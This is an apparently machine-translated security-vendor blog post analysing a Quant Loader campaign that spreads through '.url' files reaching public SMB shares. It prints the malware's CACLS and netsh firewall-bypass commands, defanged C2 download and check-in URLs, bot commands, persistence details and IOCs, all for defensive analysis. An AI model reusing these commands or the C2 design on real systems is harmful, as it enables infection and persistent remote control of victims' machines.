首页  /  服务器防病毒恶意软件安全  /  深入分析新兴的“.url” 恶意软件 campaign

深入分析新兴的“.url” 恶意软件 campaign

撰写者
普拉迪普·库尔卡尼(Pradeep Kulkarni)
服务器防病毒, 恶意软件, 安全
  • 5
    分享
预计阅读时间: 5 分钟

上周,我们在博客上发表了关于新事物出现的信息 攻击向量“ .url” 用于传播恶意软件。在此博客文章中,我们将深入研究此“ .url”向量的攻击链,并详细说明正在积极利用它的Quant Loader恶意软件。

让我们看一下下面的攻击链,该链描述了此攻击中观察到的执行顺序,其中“.url”文件用于传播恶意软件。

图1.攻击链
图1.攻击链

下图是攻击链的流程摘要。

图2.流程摘要
图2.流程摘要

如上所述,通常“ .url”包含URL(“ http://”或“ http:// _”),但是在这种情况下,我们发现SMB共享已被访问以执行恶意JavaScript。

图3. .URL文件访问SMB共享
图3. .URL文件访问SMB共享

上面的文件与 CVE -2016-3353 Internet Explorer在其中错误地处理了Internet区域中的“ .url”文件,并允许远程攻击者通过精心制作的文件来绕过预期的访问限制。

这些SMB共享可公开访问,并且无需身份验证即可访问。图3和图4显示了存储恶意JavaScript文件的公共SMB共享位置“ buyviagraoverthecounterusabb [。] net / documents /”。恶意SMB共享位置IP地址为“ 91.102.153.90”。

图4. SMB共享访问时捕获通信
图4. SMB共享访问时捕获通信
图5.公开存储的JavaScript文件
图5.公开存储的JavaScript文件

下图显示了通过SMB协议传送给受害者的恶意JavaScript。

图6. SMB请求
图6. SMB请求

打开恶意JavaScript后,将通过“ wscript.exe”应用程序将其打开。

图7.用户提示
图7.用户提示

一旦受害者单击“打开”,恶意JavaScript便下载了第二阶段恶意软件,如图5所示。该恶意JavaScript被高度混淆,仅用作第一阶段下载器。

图8.恶意JavaScript下载器
图8.恶意JavaScript下载器

第二阶段恶意软件通过JavaScript在“%TEMP%”位置下载,并通过“ cmd.exe”生成。这是一个高度混淆的可执行文件,可直接在内存中执行。该恶意软件似乎是“数量 Loader”,可用于下载其他恶意软件。在Quick Heal 安全 Labs分析时,我们没有发现Quant Loader下载的恶意软件。让我们看一下Quant Loader恶意软件的工作原理。

数量 Loader恶意软件通过“ Keyboard Layout \ Preload”检查系统的所有键盘语言环境。如果语言环境位于俄罗斯,乌克兰和哈萨克斯坦之间,则退出。

图9.检查系统的语言环境
图9.检查系统的语言环境

数量 Loader使用以下注册表项来确定受害者系统的32/64位配置。然后,它在与CnC服务器通信时使用与CNC请求相同的信息。

HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ ProgramFilesDir(x86)

它还检查是否存在以下注册表项。

图10.检查不同安全产品的存在
图10.检查不同安全产品的存在

它将在“”中删除名为“ dwm.exe”的自我复制<Appdata ShellFolder>\<8DigitNumeric>”文件夹,并通过注册表中的“运行”条目将其设置为自动执行。这样做是为了在系统中实现持久性。

图11.恶意软件文件的自我复制
图11.恶意软件文件的自我复制

与CNC服务器通信时,此8位数字用作Bot ID(BotId)。它通过以下步骤生成BotId:

  1. 阅读“ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ MachineGuid”
  2. 按出现的顺序仅从Machine ID的值中提取数字
  3. 忽略前5个数字,并从5开始考虑8个数字
图12.使用MachineGuid作为BotId
图12.使用MachineGuid作为BotId

然后,它将8位数字文件夹和dwm.exe文件的用户访问权限更改为已登录用户的读取模式。这限制了用户删除或修改文件夹和“ dwm.exe”。这是通过以下命令使用正版CACLS Windows文件来实现的。

cmd / c echo Y | CACLS“c:\users\<username>\ appdata \ roaming \ 48378942 \ dwm.exe” /P “<username>:R”

 然后,Quant Loader将以下规则添加到防火墙中,名称为“Quant”允许恶意软件绕过防火墙规则在Internet上进行通信。

netsh advfirewall防火墙添加规则名称=”Quant” program=”c:\users\<username>\ appdata \ roaming \ 48378942 \ dwm.exe”dir =退出动作=允许

它还尝试连接到CNC域“ wassronledorhad [。]中”并下载其他恶意文件。

进行分析时,CNC没有响应。但是,静态分析为Quant Loader可能的CNC通信和其他功能提供了一些见解。

如果CNC服务器仍在运行,则将下载以下文件。

hxxp://wassronledorhad.in/q2/lib/zs.dll.c
hxxp://wassronledorhad.in/q2/lib/bs.dll.c
hxxp://wassronledorhad.in/q2/lib/sql.dll.c

这些文件分别作为zs.dll,bs.dll和sqlite3.dll存储在%APPDATA%\ z文件夹中。

图13.下载文件名
图13.下载文件名

它将检查“ zs.dll”和“ sqlite3.dll”的文件大小是否小于0x20000。然后,它从zs.dll执行“ Main”功能。

图14.加载并执行下载的DLL
图14.加载并执行下载的DLL

数量 Loader tried to send the following requests to the CNC Server.

hxxp:// wassronledorhad [。] in / q2 / index.php?id = 48378942&c=2&mk=75490e&il=H&vr=1.73&bt=32

其中id = BotId,c =请求计数器,bt = 32/64位系统

它等待来自CNC服务器的命令,该服务器具有以下结构:

[BotId] [Command] [Data]

该命令可以是以下任意命令–“ pwd”,“ exe”,“ doc”,“ dll”。

图15.机器人命令列表
图15.机器人命令列表

还发现“ pwd”命令正在通过“ Main”功能执行zs.dll。

对于其余的命令,该恶意软件会在“ temp”文件夹中创建一个名称为Windows timestamp的文件。

图16.使用系统时间制作文件名
图16.使用系统时间制作文件名

如果命令是“ exe”,则它将使用ShellExecute API执行文件。

图17.调用ShellExecute执行下载的exe文件
图17.调用ShellExecute执行下载的exe文件

如果命令是“ doc”,则它将使用WinExec API执行文件。

图18.调用WinExec执行下载的doc文件
图18.调用WinExec执行下载的doc文件

如果命令是“ dll”,那么它将利用“ LoadLibrary”和“ GetProcaddress”从dll执行所需的功能,如前面给出的图13所示。

因此,根据命令,机器人可以下载其他恶意文件并执行它们。

数量 Loader当前正在使用“ .Url”攻击向量。未来几天,我们可能会看到其他恶意软件家族对这种新手攻击媒介(.url)的使用有所增加。

危害指标:

50C359167CC74A962CACAFF2A795B23C
4394536E9A53B94A2634C68043E76EF8
buygragraoverthecounterusabb [。] net / documents / B200795218387 [。] js
91.102.153.90

主题专家

  • 普拉迪普·库尔卡尼(Pradeep Kulkarni),Amar Patil,Aniruddha Dolas |快速修复安全实验室

普拉迪普·库尔卡尼(Pradeep Kulkarni)
关于普拉迪普·库尔卡尼

普拉迪普·库尔卡尼(Pradeep Kulkarni)在Quick Heal Technologies Limited中领导IPS团队。他在IT安全行业工作了11年以上,曾从事过各种...

普拉迪普·库尔卡尼(Pradeep Kulkarni)的相关文章»

相关文章

没意见

发表评论。您的电子邮件地址将不会被发布。

验证码图片